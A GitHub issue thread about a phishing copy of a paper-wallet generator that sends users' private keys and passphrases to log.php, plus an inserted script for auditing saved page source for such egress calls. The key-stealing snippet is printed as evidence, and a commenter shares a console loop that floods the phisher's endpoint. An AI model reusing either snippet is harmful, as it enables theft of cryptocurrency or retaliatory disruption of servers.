Open Khaezzar opened 6 years ago
Oh wow, that's fucking bad! Thank you for reporting that.
IF YOU USED THIS WEBSITE, MOVE YOUR COINS ASAP!
You can find this kind of thing all over the source code:
var http = new XMLHttpRequest();
http.open("POST", "log.php", true);
http.send(generatedAddress + "," + Bitcoin.Base58.encode(encryptedKey) + "-" + document.currentBipPassphrase + "," + janin.selectedCurrency.name);
To be clear, this means that each time someone generates a wallet, the private key is sent to the guy that hosts this copy and he can steal everything anytime later.
The domain was created 4 months ago: 2017-08-05
I'm not sure what to do about that ... I guess I should register all similar domain names but that just prevents the obvious name squatting, not everything. And this guy already has the domain ...
Anyway, the only legitimate source is https://walletgenerator.net or the Github repo here: https://github.com/MichaelMure/WalletGenerator.net/archive/master.zip
I asked the hosting company (cronon.net) to take down the website and prevent him from accessing the database. Hopefully they are quick to act.
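The logging call quoted above is the kind of thing to look for when auditing a saved copy of the generator. As an added example (not part of the thread or the project's code), this Node.js script flags network-egress primitives in page source and rates them "high" when secret-looking identifiers appear within the next few lines; the pattern list, the keyword heuristic and the clean sample are assumptions.

```javascript
// Added example (not from the thread): flag network-egress calls in a saved
// copy of a client-side wallet generator, and mark those near key material.
const EGRESS = [
  ["XMLHttpRequest", /new\s+XMLHttpRequest\b/],
  ["fetch", /\bfetch\s*\(/],
  ["sendBeacon", /\.sendBeacon\s*\(/],
  ["WebSocket", /new\s+WebSocket\b/],
  ["form action", /<form\b[^>]*\baction\s*=/i],
];
// Identifier fragments that suggest secrets; heuristic list, an assumption.
const SENSITIVE = /key|passphrase|seed|wif|mnemonic/i;
const WINDOW = 3; // lines after the call to inspect for secret-looking names

function auditSource(source) {
  const lines = source.split(/\r?\n/);
  const findings = [];
  lines.forEach((text, i) => {
    for (const [name, re] of EGRESS) {
      if (!re.test(text)) continue;
      // Look at the call line plus the following WINDOW lines.
      const context = lines.slice(i, i + WINDOW + 1).join("\n");
      findings.push({
        line: i + 1,
        primitive: name,
        severity: SENSITIVE.test(context) ? "high" : "review",
      });
    }
  });
  return findings;
}

// Sample 1: the snippet quoted in the thread above.
const PHISHING_SAMPLE = [
  'var http = new XMLHttpRequest();',
  'http.open("POST", "log.php", true);',
  'http.send(generatedAddress + "," + Bitcoin.Base58.encode(encryptedKey) + "-" + document.currentBipPassphrase + "," + janin.selectedCurrency.name);',
].join("\n");

// Sample 2: constructed benign lines with no network calls.
const CLEAN_SAMPLE = [
  'var qr = document.getElementById("qrcode");',
  'qr.textContent = generatedAddress;',
].join("\n");

console.log(auditSource(PHISHING_SAMPLE));
console.log(auditSource(CLEAN_SAMPLE));
```

A static match like this misses obfuscated or dynamically built calls, so it supports, rather than replaces, using the official source named above.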
thanks for your fast act.
Feel free to spam him with crap Open Chrome webdeveloper tool and paste this into the javascript console to send crap every 1.5 seconds
function doit() { var http = new XMLHttpRequest(); http.open("POST", "log.php", true); http.send("F*CKYOU,VERYMUCH,Bitcoin"); setTimeout(doit,1500); }
doit();
Seems to be gone or he blocked me "Service Temporarily Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later."
> Seems to be gone or he blocked me "Service Temporarily Unavailable
I've contacted the hoster and asked them to take it down.
Seems to have worked then - good job!
You need to get the domain name removed... or he can just set it up again at a different host
So .... the guy is back with the same domain and the same shitty code to steal private keys. Obviously the take down request didn't work. I had no reply whatsoever.
Any advice for a next step?
@MichaelMure I can use my private servers to take his website down by flooding his wallet logs with his shitty code
@ExtendLord that might work but only temporarily ...
I did it already 6 days ago, but can you all report the website to google as phishing ? https://safebrowsing.google.com/safebrowsing/report_phish/
Yeah.. the host won't take it down.
I've asked Cloudflare to take action.
You should not log in to your bank website without checking the SSL certificate, but that's still called phishing when someone builds a copy. Nice bullshit ...
Thanks for trying
I'm kinda busy atm but you can contact the domain registrar: Registrar Abuse Contact Email: abuse-domains@cronon.net Registrar Abuse Contact Phone: +49.3039802410
or directly sourceWAY: Admin Phone: +49.15775728399 Admin Email: mail@sourceway.de
Cheers! PS: If you wanna seek legal prosecution you may want to first report him at your local police station, then have the cops issue an EU warrant asking the domain registrar (sourceway/cronon) for the details of the person who registered that domain.
It returns a 500 error now. Win ?
In case you haven't noticed, the phishing site is back up, and still contains many segments of code which log private keys and the currency associated with them.
It is probably worth pointing out that the numbering scheme (0 .. 5) on the steps to take (on your homepage) makes it easy to remove the good advice. On the phishing site, there is no step 0, only 1 through 5, and it does not look like the site is missing anything. So if you change the numbering scheme, you could make it more awkward for the phisher to update their site (if they do at all). Other features it lacks are the range of translations, so it is quite easy to tell one site from the other.
We need to put an end to this. It's like Marie Curie watching a shroom cloud every time somebody generates a wallet there. Anyways, I have proactively bought the walletgenerator.eu domain and my request to redirect it to walletgenerator.net has just been processed. There are, however, still several lucrative variants vacant.
> Anyways, I have proactively bought the walletgenerator.eu domain and my request to redirect it to walletgenerator.net has just been processed.
Thank you
Is this issue resolved?
Is the integrity of the walletgenerator from this repository working fine, without bugs or threat of private keys being extracted, if downloaded via this repository? Thanks
@crines
> Is the integrity of the walletgenerator from this repository working fine, without bugs or threat of private keys being extracted, if downloaded via this repository?
Yes - this issue only relates to someone "squatting" on a similar domain. This repository is unaffected by the issue mentioned here.
WalletGenerator.org is still around. Searched the code and that same code that captures user's info is still there. Beware.
How about you return the 12 BTC your site stole from me???
> How about you return the 12 BTC your site stole from me???
How did his site steal it?
I uploaded 12 BTC and the funds were almost immediately transferred to another account. This means they had saved the address and keys. Criminals. I’ve reported to FBI.
On Fri, Nov 20, 2020 at 12:38 AM, themotu notifications@github.com wrote:
> How did his site steal it?
Check the history - it's not the official site stealing them man, it's the phishing site with very similar domain.
@jmg2485 I know some details about the guy who has stolen your bitcoins. Contact me, maybe we can do something together -Timothy.schield@gmx.ch
> @jmg2485
> I know some details about the guy who has stolen your bitcoins. Contact me, maybe we can do something together -Timothy.schield@gmx.ch
No GitHub history? Shady proposition based off no information that could actually lead to you being able to do this? Smells like scam
> @jmg2485 I know some details about the guy who has stolen your bitcoins. Contact me, maybe we can do something together -Timothy.schield@gmx.ch
> No GitHub history? Shady proposition based off no information that could actually lead to you being able to do this? Smells like scam
I got scammed myself (1.8 BTC) - I was in contact with @MichaelMure about this 6 months ago. And I will not post the personal information of this scammer in GitHub - what do you want to see as proof? So if @jmg2485 wants to try to get his btc (and I hope mine) back, he can contact me. If you don't believe me feel free..
I’m all ears. Yes I would like to know more. And if possible I will split the recovery of assets
Let me know how you’d like to proceed. Thank you.
On Sat, Jan 2, 2021 at 11:04 PM, timoshc notifications@github.com wrote:
> @jmg2485 I know some details about the guy who has stolen your bitcoins. Contact me, maybe we can do something together -Timothy.schield@gmx.ch
> No GitHub history? Shady proposition based off no information that could actually lead to you being able to do this? Smells like scam
> I got scammed myself (1.8 BTC) - I was in contact with @MichaelMure about this 6 months ago. And I will not post the personal information of this scammer in GitHub - what do you want to see as proof? So if @jmg2485 wants to try to get his btc (and I hope mine) back, he can contact me. If you don't believe me feel free..
@jmg2485 don't fall for it, probably @timoshc is the scammer itself (come on dude, new github account and a gmx.ch email, you cannot raise more red flags).
If you (@timoshc) actually got robbed and got the offender's personal data, you should report it to the police and let them handle it, not try to form a group of "avengers" and do exactly what about it? It's also fairly simple to prove what you say (I have seen on other places you claim you actually went to the police), so just upload a picture of the complaint you filed at the police station. Lastly, why wouldn't you post the scammer's personal data here if -supposedly- going to the police didn't achieve anything?
I reported it to the local police, the file was closed after 3 months. I'm searching now for a person from Canada (the scammer's home country), who also got scammed. I will share my information with him, so he can report it to the Canadian police. Hopefully they can/will do more than.
I'm not sure what's your behavior of right, but here in Germany it's illegal to dox private information on the internet, even if it's a scammer - so I will not post any of his data here.
As I wrote before: If you don't believe me, you don't have to. Btw I don't know what's the problem with gmx.ch? It's a regular German/Swiss mail provider.
Feds are already involved
On Sun, Jan 3, 2021 at 8:02 AM, Sergio Gonzalez notifications@github.com wrote:
> @jmg2485 don't fall for it, probably @timoshc is the scammer itself (come on dude, new github account and a gmx.ch email, you cannot raise more red flags).
> If you (@timoshc) actually got robbed and got the offender's personal data, you should report it to the police and let them handle it, not try to form a group of "avengers" and do exactly what about it? It's also fairly simple to prove what you say (I have seen on other places you claim you actually went to the police), so just upload a picture of the complaint you filed at the police station. Lastly, why wouldn't you post the scammer's personal data here if -supposedly- going to the police didn't achieve anything?
Hi, there is your web at walletgenerator.net but there is another at walletgenerator.org. It is unclear where the true one is, and it's hard not to make a mistake when looking for your web from Google. Do you think to add a message in your web page and a signed (sha256sum) file? Can other sites like Dogecoin.com tell about it in their paper-wallet? This will legitimate your hard work.
Thanks for your time.